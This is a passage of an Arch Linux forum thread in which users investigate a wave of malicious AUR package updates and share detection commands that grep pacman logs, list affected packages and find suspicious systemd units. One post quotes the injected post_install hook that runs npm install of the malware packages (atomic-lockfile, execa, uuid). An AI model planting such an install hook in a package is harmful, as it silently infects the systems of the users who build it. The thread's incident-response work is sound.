multiple malicious AUR updates

hidefromkgb · 2026-06-13 17:44:10

Returning to the forums after god knows how many years to report that I was likely affected.

I installed jd-gui-bin 9 hours ago (in fact that was a full system upgrade but jd-gui-bin is the only package installed on my system from the list of known infected packages), and around the same time a .pnpm-store dir appeared out of nowhere on the partition where I keep my AUR build cache.
Is there a way to test whether my system is compromised?

Last edited by hidefromkgb (2026-06-13 17:58:43)

progandy · 2026-06-13 18:01:04

hidefromkgb wrote:

Returning to the forums after god knows how many years to report that I was likely affected.
I installed jd-gui-bin 9 hours ago, and around the same time a .pnpm-store dir appeared out of nowhere on the partition where I keep my AUR build cache.
Is there a way to test whether my system is compromised?

9 hours ago, no known malicous packages were left on the AUR.
jd-gui-bin was never compromised as far as I can see, at least not as part of this round.
jd-gui (not -bin) was compromised from approximately 2026-06-11T17:20:54.000Z to 2026-06-11T21:20:34.000Z (UTC time!). Depending on caches and how you downloaded, you might have gotten the compromised PKGBUILD some time later as well I guess.

https://github.com/archlinux/aur/activi … jd-gui-bin
https://github.com/archlinux/aur/activity?ref=jd-gui

First step, check if you have any of the affected packages. The following commands list all, then check the package creation and install dates, anything since June 10th 2026 needs a closer look.

curl https://md.archlinux.org/s/SxbqukK6IA/download | pacman -Qqi - 2>/dev/null

find post_install things that ran npm/bun

find /var/lib/pacman/local -iname install -exec grep "npm\|bun\|lockf\|js-\|-js" '{}' '+'

Otherwise maybe https://bbs.archlinux.org/viewtopic.php … 2#p2301022

Last edited by progandy (2026-06-13 18:07:35)

hidefromkgb · 2026-06-13 18:35:01

progandy wrote:

First step, check if you have any of the affected packages.

Yes, 4 of them actually.
One is a mismatch for sure (qt5-3d), having been installed from the main repo.
The other 3 are as follows:
zafiro-icon-theme-git (Install Date: Wed 22 Apr 2026 09:21:43 PDT)
jd-gui-bin (Install Date: Sat 13 Jun 2026 01:58:16 PDT)
compiz (Install Date: Sat 13 Jun 2026 02:18:10 PDT)

progandy wrote:

find post_install things that ran npm/bun

Now this is helpful! I never knew Pacman/YAY kept installation logs.
Nothing in there. I might've dodged the bullet this time. Hopefully.

P.S.: I suspect that the culprit behind those NPM packages was probably Ladybird, which I once built from AUR to see if it's usable, and now it just gets updated with the rest of the system.

Last edited by hidefromkgb (2026-06-13 18:39:15)

progandy · 2026-06-13 18:41:00

hidefromkgb wrote:

Now this is helpful! I never knew Pacman/YAY kept installation logs.
Nothing in there. I might've dodged the bullet this time. Hopefully.

It has an installation log, /var/log/pacman.log. It does not log exactly what is part of the post_install script, though. The scripts are stored in the repository of installed packages, though. That is the place from where they are called during installation and wehn uninstalling (they can also contain uninstall commands, in the post_uninstall function)

qt5-3d has been dropped from the official repositories and is now in the AUR where it was orphaned until this malicious update. That is why it is now appearing in the list. I did not do any date filtering.
oh, and jd-gui-bin is listed in your output because it "provides" jd-gui, but it was not compromised. Probably the same with compiz (compizconfig-python was compromised)

Last edited by progandy (2026-06-13 18:47:34)

seth · 2026-06-13 18:46:53

The other 3 are as follows:
zafiro-icon-theme-git (Install Date: Wed 22 Apr 2026 09:21:43 PDT)
jd-gui-bin (Install Date: Sat 13 Jun 2026 01:58:16 PDT)
compiz (Install Date: Sat 13 Jun 2026 02:18:10 PDT)

None of those are listed in https://md.archlinux.org/s/SxbqukK6IA - similar-ish upstream sources don't matter - it's the actual specific verbatim AUR PKGBUILD that were corrupted, eg. compiz-adjacent

libcompizconfig-git
menumaker-compiz
compizconfig-python
compizconfig-python-git
compiz-fusion-plugins-experimental
compiz-fusion-plugins-experimental-git
compiz-fusion-plugins-extra
compiz-fusion-plugins-extra-git

but NOT https://aur.archlinux.org/packages/compiz

wonderworld · 2026-06-14 07:40:42

Sidekick wrote:

wonderworld wrote:
So it looks like at least some, maybe all? packages must be installed for the first time to install the malware?
Would be nice if others could confirm that.
I don't think so. At least when running makepkg, it will compile/build the package and only pacman itself will then check the version of the package. I'm not sure when this
install=[packagename]-deps.install
is executed and depending on that a system would already be infected even if the same package version is already installed. I'm guessing yay checks the package version before downloading and building a AUR package, but I don't know that.

OK, I investigated a bit further.

The wiki says concerning PKGBUILD:
(https://wiki.archlinux.org/title/PKGBUILD)

install
The name of the .install script to be included in the package.

pacman has the ability to store and execute a package-specific script when it installs, removes or upgrades a package. The script contains the following functions which run at different times:
post_install — The script is run right after files are extracted. Any additional notes that should be printed after the package is installed should be located here. One argument is passed: new package version.

This sounds like Pacman runs this right *after* unpacking a package.
So install= would just reference the script to run.
The function *in* the script would reference *when* it's run.

In my case it was "post_install"
https://github.com/archlinux/aur/compar … 76a658ac6e

4
libquvi-scripts-deps.install
Original file line number 	Diff line number 	Diff line change
@@ -0,0 +1,4 @@
post_install() {{
  cd /tmp
  npm install atomic-lockfile execa uuid
}}

and pacman log did not log a package install of the infected package after the malware was injected.
Probably it really didn't mind to update a package with the same version number?

grep --text "upgraded libquvi-scripts" /var/log/pacman.log 
[2015-05-23 02:25] [ALPM] upgraded libquvi-scripts (0.9.20131130-2 -> 0.9.20131130-3)
[2018-06-11 00:54] [ALPM] upgraded libquvi-scripts (0.9.20131130-3 -> 0.9.20131130-4)
[2020-05-20T00:57:12+0200] [ALPM] upgraded libquvi-scripts (0.9.20131130-4 -> 0.9.20131130-5)
[2026-06-09T19:25:30+0200] [ALPM] upgraded libquvi-scripts (0.9.20131130-5 -> 0.9.20131130-6)

Malware was injected on 2026-06-11
Version with malware had the same version number 0.9.20131130-6 as the version installed on 2026-06-09

Feeling a bit better now, but still not 100% sure what was going on.

Last edited by wonderworld (2026-06-14 07:43:24)

noesoespanol · 2026-06-14 09:34:41

hidefromkgb wrote:

Returning to the forums after god knows how many years to report that I was likely affected.
I installed jd-gui-bin 9 hours ago (in fact that was a full system upgrade but jd-gui-bin is the only package installed on my system from the list of known infected packages), and around the same time a .pnpm-store dir appeared out of nowhere on the partition where I keep my AUR build cache.
Is there a way to test whether my system is compromised?

Honestly, even though it's really a nasty sounding suggestion, but in such situation, I wouldn't go for test scripts and such, just burn it with fire, the entire thing, reinstall clean and next time, be more careful or have snapshot clones of the system (I do CloneZilla full clone, not BTRFS snapshots, because this is more "pure" and simple to restore.)

I mean, why risk it?

Because otherwise, it's like "having some unknown random person in your home, somewhere, in some corner.... well, maybe. We don't know. Maybe the person left, maybe it's there. We searched a bit though, seems no one there."

Would you sleep calm at night? I wouldn't. *lol*

Last edited by noesoespanol (2026-06-14 09:37:31)

kokoko3k · 2026-06-14 09:46:54

#!/bin/bash
    curl -s https://md.archlinux.org/s/SxbqukK6IA|grep -vi '<\|>'|grep -E '[A-Za-z0-9]'|sort -u > /tmp/l.txt
    wc -l /tmp/l.txt
    while IFS= read -r f; do
        if grep -F -e "installed $f " -e "upgraded $f " /var/log/pacman.log ; then
            echo "Possible match: $f"
            echo "Enter to continue." 
            read -r < /dev/tty
        fi
    done < /tmp/l.txt

koko@thinkbook# ./infected_check.sh 
1936 /tmp/l.txt
[2023-10-22T12:50:53+0200] [ALPM] installed ob-xd (2.10-2)
[2025-08-28T07:50:28+0200] [ALPM] upgraded ob-xd (2.10-2 -> 2.10-4)
Possible match: ob-xd
Enter to continue.

[2023-10-22T12:50:53+0200] [ALPM] installed ob-xd-common (2.10-2)
[2025-08-28T07:50:27+0200] [ALPM] upgraded ob-xd-common (2.10-2 -> 2.10-4)
Possible match: ob-xd-common
Enter to continue.

[2023-10-22T12:50:53+0200] [ALPM] installed ob-xd-lv2 (2.10-2)
[2025-08-28T07:50:28+0200] [ALPM] upgraded ob-xd-lv2 (2.10-2 -> 2.10-4)
Possible match: ob-xd-lv2
Enter to continue.

[2023-10-22T12:50:53+0200] [ALPM] installed ob-xd-standalone (2.10-2)
[2025-08-28T07:50:28+0200] [ALPM] upgraded ob-xd-standalone (2.10-2 -> 2.10-4)
Possible match: ob-xd-standalone
Enter to continue.

[2023-10-22T12:50:53+0200] [ALPM] installed ob-xd-vst3 (2.10-2)
[2025-08-28T07:50:28+0200] [ALPM] upgraded ob-xd-vst3 (2.10-2 -> 2.10-4)
Possible match: ob-xd-vst3
Enter to continue.

As i understood the problem started some days ago, but I'm not sure when exactly.
Since I've to check some other systems, does this preliminary script looks ok to you?
What's the start date one have to worry about?

thanks!

--edit--
on another system I've:

[2021-05-28T09:43:29+0200] [ALPM] installed python-monotonic (1.6-1)
[2022-01-11T08:40:26+0100] [ALPM] upgraded python-monotonic (1.6-1 -> 1.6-3)
[2023-10-12T12:19:47+0200] [ALPM] upgraded python-monotonic (1.6-3 -> 1.6-4)
[2026-06-05T12:51:34+0200] [ALPM] upgraded python-monotonic (1.6-4 -> 1.6-5)
[2026-06-05T13:05:50+0200] [ALPM] upgraded python-monotonic (1.6-5 -> 1.6-6)
[2026-06-05T13:51:45+0200] [ALPM] upgraded python-monotonic (1.6-6 -> 1.6-7)
Possible match: python-monotonic
Enter to continue.

but the PKGBUILD 1.6-7 seems fine to me (?)

https://aur.archlinux.org/cgit/aur.git/ … d2b8e9ad71

Last edited by kokoko3k (2026-06-14 10:00:41)

seth · 2026-06-14 12:14:08

What's the start date one have to worry about?

https://bbs.archlinux.org/viewtopic.php … 7#p2301157 - not sure whether that's un- or semi-related, all of this blew up last thursday/friday.

Do you or did you ever have npm or bun installed? (Those should show up in your pacman log)

Syl · 2026-06-14 13:53:37

gofree wrote:

I had similar results with libgdata hopefully its clear as the malicious campaign lasted last 2 days - this is something I really miss from official information. Hopefully I'm right about this one and I understand it correctly that the packages we're compromised only if built/updated for the last two days or so.

wow, thanks a lot, I was in the exactly same situation, with libgdata, last updated in march. Safe
[2026-03-05T21:53:07+0100] [ALPM] upgraded libgdata (0.18.1-4 -> 0.18.1-5)

Last edited by Syl (2026-06-14 14:01:13)

kokoko3k · 2026-06-14 15:26:06

seth wrote:

What's the start date one have to worry about?
https://bbs.archlinux.org/viewtopic.php … 7#p2301157 - not sure whether that's un- or semi-related, all of this blew up last thursday/friday.
Do you or did you ever have npm or bun installed? (Those should show up in your pacman log)

[2026-06-05T14:02:53+0200] [ALPM] upgraded npm (11.10.1-1 -> 11.16.0-1)

Yes, npm only is installed,11.16.0

found the malicious PKGBUILD:
https://github.com/archlinux/aur/compar … f5641e0105

If I'm reading it right, it popped up on June, 11, lucky me I upgraded on June,5 ?

Last edited by kokoko3k (2026-06-14 15:59:14)

The Infinity · 2026-06-14 17:51:10

I've just noticed that lightly-qt is affected now: https://aur.archlinux.org/packages/lightly-qt
Probably all of these are: https://aur.archlinux.org/packages?K=pingwin840&SeB=m

Last edited by The Infinity (2026-06-14 17:51:39)

5hridhyan · 2026-06-14 18:05:57

43 packages by one account!?
also https://aur.archlinux.org/account/pingwin840 shows registered 2024, I mean "2 years old account" 1 min silence for those who proposed/proposing the "3 month age account; trustworthy" or "check maintainers registered date" or so....

Edit:
or might be compromised? It would be terrifying if THAT old accounts starts malicious actions, it would be "game of trust" like among us, finding the imposter

Last edited by 5hridhyan (2026-06-14 18:19:41)

seth · 2026-06-14 18:43:23

If I'm reading it right, it popped up on June, 11, lucky me I upgraded on June,5 ?

Yes, also the malware leaves some patterns. Check the npm list for the atommic-lockfile thing and look at the files showing up in

grep -RA1 'Restart=always' {/etc/systemd/system,$HOME/.config/systemd/user} | grep -B1 RestartSec=30

https://ioctl.fail/preliminary-analysis-of-aur-malware/

or might be compromised?

There could be a lot of stale users w/ weak or compromised passwords that at some point registered to comment on a package and then forgot about the account, yes.

it would be "game of trust" like among us to finding the imposter

You trust no AUR user, not even the ancient deity ones. You're trusting your own estimate of the local PKGBUILD you're going to run.

andrejr · 2026-06-14 18:49:08

Please remove / lock / clean this package:

https://aur.archlinux.org/packages/kicadlibrarian

The new maintainer proudly espouses about putting a virus into the PKGBUILD

seth · 2026-06-14 19:08:14

Looks like it has already been cleaned up?

iqwoo · Yesterday 07:17:10

Just a stupid question, please forgive if it's too much stupid.
If I've never had npm or bum installed on my system (no trace about them in pacman logs) can I assume that my system is clean?

Thank you guys in advance

seth · Yesterday 07:30:14

"bun", but you can at least reasonably assume that you've not been subjected to the recent attacks.

iqwoo · Yesterday 07:39:34

yes... "bun" type error. sorry.

What if npm was installed (another system of mine has it): how can I check if something bad is going on? What are the symptoms?
I had some packages installed from AUR that are on the "bad" list. They've been installed in April the last time, so before these bad times. Some other that are not on the list but installed later on.

seth · Yesterday 07:51:54

https://bbs.archlinux.org/viewtopic.php … 8#p2301368
"atomic-lockfile" and "js-digest"

Natanji · Yesterday 07:57:36

I have a question. I got an email yesterday that a package that I maintained a decade ago (voxatron-hib [1]) got taken over by another user, zkhr6 [2].

With the current wave of infections using takeovers of orphaned packages in the AUR, alarm bells started ringing for me. Especially because the user also has no Arch forums account by the same name.

Might be completely legitimate though. But it's an old package for an old game which simply doesn't get any updates anymore.

Is there any proper channel to report this or make someone double-check?

[1] https://aur.archlinux.org/pkgbase/voxatron-hib/
[2] https://aur.archlinux.org/account/zkhr6/

seth · Yesterday 08:27:51

The user zkhr6 has been inactivated (nice artifact of this is that those dead accounts are now squatting the de-facto orphaned packages ) and the package voxatron-hib has been purged of any compromising commits by them.
Otherwise you could report such incidents to the aur-general list, https://lists.archlinux.org/mailman3/lists/?page=2

bivan · Yesterday 09:35:11

As AUR & https://aur.chaotic.cx/ user, is there a list of the infected packages? How to know if I'm infected?

Edit: the answer https://bbs.archlinux.org/viewtopic.php … 6#p2301216 sorry, maybe stick it?

Last edited by bivan (Yesterday 10:10:19)

noesoespanol · Yesterday 12:36:54

https://www.phoronix.com/news/Arch-Linu … re-Malware

Last night another round of malware in Arch Linux AUR packages was reported by developer a821. Various Node.js packages, a Plasma 6 applets package, some Firefox packages, the Aura browser, LibreWolf extensions, a NeoVim plug-in, and various other packages were all found with malware via obfuscated code. Shortly thereafter a821 reported back that the affected packages were taken care of.
Hours later, Nicolas Boichat reported more malware in AUR packages. Boichat discovered those latest malware bits using a local Gemma E2B AI model. The new malware attempt in AUR was described as "a bit more elaborate" in obfuscating the action around the Bun command.

Jesus. Seems another round is incoming. It seems to me some kind of coordinated thing, noway this is just some random idiot doing it.

Although... never underestimate the random idiots.

Last edited by noesoespanol (Yesterday 12:38:37)

gofree · Yesterday 18:04:32

Seems there is still attack https://aur.archlinux.org/cgit/aur.git/ … 1219c66654. I guess now its time https://www.youtube.com/watch?v=S5ZSDCvUwN8. Moving to debian, in my opinion this has not been communicated very well.

Arch Linux

#76 2026-06-13 17:44:10

Re: multiple malicious AUR updates

#77 2026-06-13 18:01:04

Re: multiple malicious AUR updates

#78 2026-06-13 18:35:01

Re: multiple malicious AUR updates

#79 2026-06-13 18:41:00

Re: multiple malicious AUR updates

#80 2026-06-13 18:46:53

Re: multiple malicious AUR updates

#81 2026-06-14 07:40:42

Re: multiple malicious AUR updates

#82 2026-06-14 09:34:41

Re: multiple malicious AUR updates

#83 2026-06-14 09:46:54

Re: multiple malicious AUR updates

#84 2026-06-14 12:14:08

Re: multiple malicious AUR updates

#85 2026-06-14 13:53:37

Re: multiple malicious AUR updates

#86 2026-06-14 15:26:06

Re: multiple malicious AUR updates

#87 2026-06-14 17:51:10

Re: multiple malicious AUR updates

#88 2026-06-14 18:05:57

Re: multiple malicious AUR updates

#89 2026-06-14 18:43:23

Re: multiple malicious AUR updates

#90 2026-06-14 18:49:08

Re: multiple malicious AUR updates

#91 2026-06-14 19:08:14

Re: multiple malicious AUR updates

#92 Yesterday 07:17:10

Re: multiple malicious AUR updates

#93 Yesterday 07:30:14

Re: multiple malicious AUR updates

#94 Yesterday 07:39:34

Re: multiple malicious AUR updates

#95 Yesterday 07:51:54

Re: multiple malicious AUR updates

#96 Yesterday 07:57:36

Re: multiple malicious AUR updates

#97 Yesterday 08:27:51

Re: multiple malicious AUR updates

#98 Yesterday 09:35:11

Re: multiple malicious AUR updates

#99 Yesterday 12:36:54

Re: multiple malicious AUR updates

#100 Yesterday 18:04:32

Re: multiple malicious AUR updates

Board footer